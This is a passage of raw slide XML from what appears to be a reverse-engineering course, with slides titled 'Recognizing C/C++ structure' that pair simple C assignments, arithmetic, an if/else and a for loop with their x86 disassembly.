                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>dword_40CF60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, eax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00401013 mov 	ecx, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>dword_40CF60</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00401019 push	 ecx</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0040101A push 	offset aTotalD ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>"total = %d\n"</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0040101F call 	printf</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="913" name="Google Shape;913;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923928" y="3965104"/>
            <a:ext cx="4835363" cy="2585323"/>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00401006 mov 	dword ptr [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 1</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0040100D mov 	dword ptr [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 2</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00401014 mov 	eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00401017 add 	eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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0040101A mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], eax</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0040101D mov 	ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00401020 push 	ecx</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00401021 push 	offset aTotalD ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>"total = %d\n"</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00401026 call 	printf</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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91"/>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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="920" name="Google Shape;920;p91"/>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Operation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="921" name="Google Shape;921;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1916832"/>
            <a:ext cx="1944216" cy="2031325"/>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int a = 0;</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int b = 1;</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a = a + 11;</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a = a - b;</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a--;</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b++;</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b = a % 3;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="922" name="Google Shape;922;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139952" y="1340768"/>
            <a:ext cx="3888432" cy="5355312"/>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00401006 mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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0040100D mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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00401014 mov 	eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"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00401017 add 	eax, 0Bh</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0040101A mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], eax</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0040101D mov	 ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00401020 sub 	ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"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00401023 mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], ecx</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00401026 mov 	edx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00401029 sub 	edx, 1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0040102C mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], edx</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0040102F mov 	eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00401032 add 	eax, 1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00401035 mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], eax</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00401038 mov 	eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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0040103B cdq		; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>edx:eax</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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0040103C mov 	ecx, 3</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00401041 idiv	ecx</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00401043 mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], edx</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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92"/>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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929" name="Google Shape;929;p92"/>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If statement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Google Shape;930;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="2348880"/>
            <a:ext cx="3000821" cy="2308324"/>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int x = 1;</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int y = 2;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>if(x == y){</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printf("x equals y.\n");</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else{</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printf("x is not equal to y.\n");</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="931" name="Google Shape;931;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779912" y="1794882"/>
            <a:ext cx="5256584" cy="3693319"/>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00401006 mov	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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0040100D mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 2; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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00401014 mov 	eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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00401017 cmp 	eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"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0040101A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>jnz 	short loc_40102B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0040101C push 	offset aXEqualsY_ ; "x equals y.\n"</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00401021 call 	printf</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00401026 add 	esp, 4 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>return to [ebp+var_8]</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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00401029 jmp 	short loc_401038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0040102B </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>loc_40102B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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0040102B push 	offset aXIsNotEqualToY ; "x is not equal to y.\n"</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00401030 call 	printf</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="937" name="Google Shape;937;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="126029" y="3054222"/>
            <a:ext cx="3834706" cy="3678338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="938" name="Google Shape;938;p93"/>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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="939" name="Google Shape;939;p93"/>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Loop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="940" name="Google Shape;940;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620888" y="1700808"/>
            <a:ext cx="2529347" cy="1477328"/>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int i;</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for(i=0; i&lt;100; i++)</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printf("i equals %d\n", i);</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941" name="Google Shape;941;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4426003" y="1207539"/>
            <a:ext cx="4610493" cy="5632311"/>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00401004 mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 0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0040100B jmp 	short loc_401016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0040100D loc_40100D:</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0040100D mov 	eax, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"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00401010 add 	eax, 1</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00401013 mov 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], eax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00401016 loc_401016:</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00401016 cmp 	[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>], 64h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0040101A jge 	short loc_40102F </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0040101C mov 	ecx, [</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ebp+var_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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0040101F push	 ecx</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00401020 push	 offset aID ; "i equals %d\n"</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00401025 call	 printf</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0040102A add 	esp, 8</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0040102D jmp 	short loc_40100D</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0040102F loc_40102F:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>00401034 xor 	eax, eax</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
